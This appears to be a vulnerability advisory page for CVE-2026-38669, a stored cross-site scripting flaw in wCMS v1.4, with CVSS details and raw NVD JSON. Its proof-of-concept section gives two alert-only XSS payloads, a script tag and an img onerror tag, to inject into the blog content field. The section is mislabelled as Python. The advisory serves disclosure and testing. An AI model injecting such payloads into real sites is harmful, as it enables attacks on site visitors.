Security Vulnerability Report
中文
CVE-2026-38669 CVSS 6.1 MEDIUM

CVE-2026-38669

Published: 2026-05-04 17:16:23
Last Modified: 2026-05-05 20:24:05

Description

wCMS v.1.4 is vulnerable to Cross Site Scripting (XSS) when creating a new blog.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

wCMS v1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for Stored XSS in wCMS v1.4 --> <!-- Inject this payload into the 'Blog Content' field when creating a new blog --> <script> alert('CVE-2026-38669 XSS Triggered'); </script> <!-- Alternative payload using image tag --> <img src=x onerror=alert('CVE-2026-38669 XSS')>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38669", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:23.333", "lastModified": "2026-05-05T20:24:04.853", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "wCMS v.1.4 is vulnerable to Cross Site Scripting (XSS) when creating a new blog."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/thv930/yumeng_wu/tree/main/1/readme.md", "source": "[email protected]"}, {"url": "https://github.com/thv930/yumeng_wu/tree/main/1/readme.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}